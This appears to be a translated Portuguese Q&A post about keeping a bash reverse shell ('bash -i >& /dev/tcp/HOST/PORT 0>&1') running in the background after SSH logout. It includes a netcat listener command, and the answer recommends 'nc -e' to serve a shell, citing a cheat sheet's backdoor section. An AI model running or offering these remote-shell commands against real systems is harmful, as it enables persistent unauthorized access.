Eu quero executar bash -i >& /dev/tcp/HOST/PORT 0>&1 em segundo plano no server1. Eu quero ouvir a conexão e enviar comandos de volta em HOST/PORT . Então, o tcpdump não é suficiente para isso.
Eu tentei executá-lo em segundo plano com:
bash -i >& /dev/tcp/HOST/PORT 0>&1 & e nohup bash -i >& /dev/tcp/HOST/PORT 0>&1 & disown
Mas os comandos acima não parecem funcionar. Eu também tentei,
bg bash -i >& /dev/tcp/HOST/PORT 0>&1
Também não está funcionando.
Ambos não permitem que eu me conecte ao server1 adequadamente quando usar nc -l -vv -p PORT .
Ele funciona quando eu executo apenas bash -i >& /dev/tcp/HOST/PORT 0>&1 , mas isso fechará essa conexão específica quando eu desconectar a conexão SSH e também não permitir que eu insira novos comandos após esse comando.
Tenho quase certeza de que seu problema é que o operando -interactive espera um terminal e o plano de fundo do processo corta seu stdin/stdout . Considere usar nc ... -e para invocar o shell na conexão. O link contém uma pequena folha de checagem em pdf netcat . Para -e veja BACKDOORS. Você provavelmente precisará de uma compilação GNU de nc para usá-lo - senão você vai querer recompilar.
Tags bash io-redirection